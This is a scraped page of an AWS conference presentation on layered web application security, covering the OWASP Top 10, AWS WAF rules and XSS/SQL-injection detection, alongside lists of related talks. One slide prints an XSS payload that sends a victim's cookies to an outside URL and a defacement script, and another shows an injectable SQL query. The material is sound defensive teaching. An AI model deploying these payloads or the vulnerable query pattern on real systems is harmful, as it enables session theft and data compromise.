Best Practices for IoT Security in the Cloud
 
Best Practices for IoT Security in the Cloud
Best Practices for IoT Security in the CloudBest Practices for IoT Security in the Cloud
Best Practices for IoT Security in the Cloud
 

Plus de Amazon Web Services

Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Amazon Web Services
 
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Amazon Web Services
 
Esegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateEsegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateAmazon Web Services
 
Costruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSCostruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSAmazon Web Services
 
Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Amazon Web Services
 
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Amazon Web Services
 
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...Amazon Web Services
 
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsMicrosoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsAmazon Web Services
 
Database Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareDatabase Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareAmazon Web Services
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSAmazon Web Services
 
API moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAPI moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAmazon Web Services
 
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareDatabase Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareAmazon Web Services
 
Tools for building your MVP on AWS
Tools for building your MVP on AWSTools for building your MVP on AWS
Tools for building your MVP on AWSAmazon Web Services
 
How to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckHow to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckAmazon Web Services
 
Building a web application without servers
Building a web application without serversBuilding a web application without servers
Building a web application without serversAmazon Web Services
 
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...Amazon Web Services
 
Introduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceIntroduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceAmazon Web Services
 

Plus de Amazon Web Services (20)

Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
Come costruire servizi di Forecasting sfruttando algoritmi di ML e deep learn...
 
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
Big Data per le Startup: come creare applicazioni Big Data in modalità Server...
 
Esegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS FargateEsegui pod serverless con Amazon EKS e AWS Fargate
Esegui pod serverless con Amazon EKS e AWS Fargate
 
Costruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWSCostruire Applicazioni Moderne con AWS
Costruire Applicazioni Moderne con AWS
 
Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot Come spendere fino al 90% in meno con i container e le istanze spot
Come spendere fino al 90% in meno con i container e le istanze spot
 
Open banking as a service
Open banking as a serviceOpen banking as a service
Open banking as a service
 
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
Rendi unica l’offerta della tua startup sul mercato con i servizi Machine Lea...
 
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
 
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsMicrosoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
 
Computer Vision con AWS
Computer Vision con AWSComputer Vision con AWS
Computer Vision con AWS
 
Database Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareDatabase Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatare
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
 
API moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAPI moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e web
 
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareDatabase Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
 
Tools for building your MVP on AWS
Tools for building your MVP on AWSTools for building your MVP on AWS
Tools for building your MVP on AWS
 
How to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckHow to Build a Winning Pitch Deck
How to Build a Winning Pitch Deck
 
Building a web application without servers
Building a web application without serversBuilding a web application without servers
Building a web application without servers
 
Fundraising Essentials
Fundraising EssentialsFundraising Essentials
Fundraising Essentials
 
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
 
Introduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceIntroduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container Service
 

Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx

  • 1. © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. 如何藉由多層次防禦搭建網路應用安全 Lucern K. Ma Manager, Solutions Architecture Amazon Web Services T r a c k 5 | S e s s i o n 1
  • 2. © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. “The only defense against the world is a thorough knowledge of it.” John Locke Philosopher
  • 4. Defense-in-depth defined • Multiple, independent layers of security • Decreases momentum and effectiveness of an attack • Requires an attacker to break multiple, progressively specialized, layers of defense • The effort required to mount a successful attack becomes increasingly difficult and costly VPC
  • 5. Defense-in-depth strategy • Building on a secure platform • Building security IN your application • Building security AROUND your application
  • 6. Defense-in-depth strategy • Building on a secure platform • Building security IN your application • Building security AROUND your application
  • 7. Defense-in-depth strategy • Building on a secure platform • Building security IN your application • Building security AROUND your application
  • 14. © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. in
  • 15. Building security in your application First, understand what to protect from Proactively architect your application to protect against these vulnerabilities Have mechanisms in place to monitor and detect when you need to take action
  • 16. App security: OWASP top 10—attack vectors 1. Injection 2. Broken authentication 3. Sensitive data exposure 4. XML external entities (XXE) 5. Broken access control 6. Security misconfiguration 7. Cross-site scripting (XSS) 8. Insecure deserialization 9. Using components with known vulnerabilities 10. Insufficient logging & monitoring
  • 17.  Vulnerable usage  Secure usage //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id); SQL injection String newName = request.getParameter("newName"); String id = request.getParameter("id"); String query = " UPDATE EMPLOYEES SET NAME="+ newName + " WHERE ID ="+ id; Statement stmt = connection.createStatement(); https://www.owasp.org/index.php/OWASP_Proactive_Controls
  • 18. XSS Attack Attack 1 : cookie theft Attack 2 : Web site defacement <script> var badURL='https://owasp.org/somesite/data=' + document.cookie; var img = new Image(); img.src = badURL; </script> <script>document.body.innerHTML='<blink>GO OWASP</blink>';</script> https://www.owasp.org/index.php/OWASP_Proactive_Controls
  • 20. App security: OWASP Top 10—Proactive controls 1. Define security requirements 2. Leverage security frameworks and libraries 3. Secure database access 4. Encode and escape data 5. Validate all inputs 6. Implement digital identity 7. Enforce access controls 8. Protect data everywhere 9. Implement security logging and monitoring 10.Handle all errors and exceptions
  • 21. © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved. around
  • 23. Seller managed rules Available in the AWS Marketplace
  • 25. AWS Managed Rules Category Ruleset Description CRS Core Ruleset Based on OWASP Top 10 EXR Admin Protection Blocks common administrative access EXR SQL DB Predefined SQL injection detection EXR Linux Linux based path traversal attempts EXR Known Bad Inputs Well known bad request indicators EXR PHP PHP specific exploits EXR WordPress WordPress specific exploits EXR Posix Posix based path traversal attempts EXR Windows Windows based path traversal attempts IP List AWS IP Reputation List Blocks IP that is known to have bot activities
  • 26. IP reputation list from the Threat Research Team Threat database Internet Request handling
  • 27. Raw Request Header Web Access Control List (Web ACL) Rule 1 Rule 2 Conditions Conditions Action Action RuleGroup Conditions: • IP Match, Geo-IP • String/Regex Match • SQLi/XSS Detection • Rate-based • Size Constraints Actions: • Accept • Deny • Count Single-digit millisecond latency Amazon CloudFront Application Load Balancer Amazon API Gateway Amazon CloudWatch Users Rule 1 Rule 2 Rule Z …… … Rule X Conditions Action
  • 29. New detection capabilities Boolean logic between conditions • e.g. “I want to block request that is coming from certain IP range or coming from certain countries.” Multiple transform • Perform series of transformation on string • e.g. “Before performing string-match on body, apply HTML decode transformation to normalize the whitespace.” Variable CIDR range for IP-match condition • Today only /8 and any range between /16 through /32 are allowed for IPv4 • You can now define anywhere from /1 to /32
  • 30. Example: XSS and SQLi detection in JSON "Statement": { "OrStatement": { "Statements": [{ "XssMatchStatement": { "FieldToMatch": { "QueryString": {} }, "TextTransformations": [ {"Priority": 1, "Type": "URL_DECODE”}, {"Priority": 2, "Type": ”LOWERCASE”}, ] } }, { "SqliMatchStatement": { "FieldToMatch": { "Body": {} }, "TextTransformations": [ {"Priority": 1, "Type": "HTML_ENTITY_DECODE”}, {"Priority": 2, "Type": ”NONE_COMPRESS_WHITE_SPACE”} ] } }] } } Available Text Transformations: NONE COMPRESS_WHITE_SPACE HTML_ENTITY_DECODE LOWERCASE CMD_LINE URL_DECODE
  • 31.
  • 32. Audit: allow only HTTPS (443) on all EC2 instances
  • 33. DemoMaster Account DemoSecurityAdmin Account DemoMember Account EC2 Instance 1 ELB 1 ELB 2 ELB 3 EC2 Instance 2 ELB 4
  • 34. AWS WAF enables defense-in-depth • Multiple integration points • CloudFront • API Gateway • Application Load Balancer • Multiple defense strategies • Managed rules • Rate-based rules • Geofencing • IP • SQL injection matching • Cross-site scripting matching • Dynamic or static matching • Text transformations
  • 35. Learn security with AWS Training and Certification 30+ free digital courses cover topics related to cloud security, including Introduction to Amazon GuardDuty and Deep Dive on Container Security Resources created by the experts at AWS to help you build and validate cloud security skills Validate expertise with the AWS Certified Security – Specialty exam Classroom offerings, such as Security Engineering on AWS, feature AWS expert instructors and hands-on activities Visit the security learning path at https://aws.training/security
  • 36. Thank you! © 2020, Amazon Web Services, Inc. or its affiliates. All rights reserved.

Notes de l'éditeur

  1. If you’re ready to continue learning, we offer 30+ courses, including free digital courses such as a 2-hour AWS Security Fundamentals You can also take AWS Security Essentials, a one-day classroom training led by an AWS expert instructor Visit the security learning path for a journey tailored for security.